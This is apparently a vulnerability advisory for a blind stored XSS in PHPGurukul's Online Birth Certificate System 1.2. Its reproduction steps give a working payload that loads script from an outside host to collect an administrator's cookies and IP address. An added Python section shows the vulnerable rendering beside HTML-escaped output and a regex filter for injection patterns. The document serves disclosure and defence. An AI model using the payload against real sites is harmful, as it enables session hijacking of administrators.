
28 lines
No EOL
1.1 KiB
Text
# Exploit Title: PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS
# Date: 2022-10-02
# Exploit Author: Prasheek Kamble
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
# Version: V 1.2
# Vulnerable endpoint: http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
# Tested on MAC OS, XAMPP

Steps to reproduce:

1) Navigate to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
2) Fill the form and enter the XSS payload "><script src=https://prasheekk05.xss.ht></script> in the address field
3) Click on Add Details and intercept the request in Burp Suite
4) After this, the details have been submitted.
5) As soon as the admin (victim) receives our request, when he clicks on it to verify our form, the XSS payload gets fired.
6) Now the attacker gets the details of the victim, like the IP address, cookies of the victim, etc.
7) So the attacker is successful in getting the victim's IP address and other details.

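The payload above works because the stored address is written back into an HTML attribute without encoding, so the leading "> closes the attribute and tag and the script element that follows is parsed as markup when the admin views the record. The following Python is an added illustration, not code from the advisory or from the PHPGurukul project: it contrasts the vulnerable rendering pattern with attribute-context encoding, and adds a simple review filter for stored form fields. The field name, the input markup and the sample submission dict are constructed for the example; the payload string itself is the one quoted in step 2.

```python
import html
import re

# Constructed sample: the address value from step 2 of the advisory,
# as a registrant would submit it through fill-birthregform.php.
PAYLOAD_ADDRESS = '"><script src=https://prasheekk05.xss.ht></script>'


def render_address_unsafe(address: str) -> str:
    """Vulnerable pattern (illustrative, not the project's own code):
    the stored value is dropped straight into a quoted attribute, so a
    leading '">' terminates the attribute and the tag."""
    return f'<input type="text" name="address" value="{address}">'


def render_address_safe(address: str) -> str:
    """Mitigated pattern: encode for the HTML attribute context.
    html.escape with quote=True turns & < > " and ' into entities,
    so the value can never close the attribute it sits in."""
    return f'<input type="text" name="address" value="{html.escape(address, quote=True)}">'


def count_tags(markup: str) -> int:
    """Rough count of element starts a browser would parse ('<' followed
    by a letter). Used here to show how many tags each rendering yields."""
    return len(re.findall(r'<[a-zA-Z]', markup))


# Patterns that indicate markup injection in a free-text field:
# a script tag, a quote followed by '>' (attribute breakout),
# a javascript: URL, or an inline event handler.
SUSPICIOUS = re.compile(r'(?i)<\s*script|["\']\s*>|javascript:|on\w+\s*=')


def flag_submission(fields: dict) -> list:
    """Return the names of fields whose values look like markup injection.
    This is a review/alerting aid for the admin side; output encoding
    (render_address_safe) is the actual fix, not this filter."""
    return [name for name, value in fields.items() if SUSPICIOUS.search(value)]


if __name__ == "__main__":
    submission = {"name": "Jane Doe", "address": PAYLOAD_ADDRESS}
    print("unsafe :", render_address_unsafe(submission["address"]))
    print("safe   :", render_address_safe(submission["address"]))
    print("flagged:", flag_submission(submission))
```

The unsafe rendering produces two element starts (the input and the injected script) while the safe rendering produces only the input, with the payload visible as literal text in the admin view. A Content-Security-Policy that disallows script sources such as an attacker-controlled host would further limit impact even if an encoding mistake slipped through.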
# PoCs

https://ibb.co/kSxFp2g
https://ibb.co/VvSVRsy
https://ibb.co/mSGp4FX
https://ibb.co/hXbJ9TZ
https://ibb.co/M6vS08S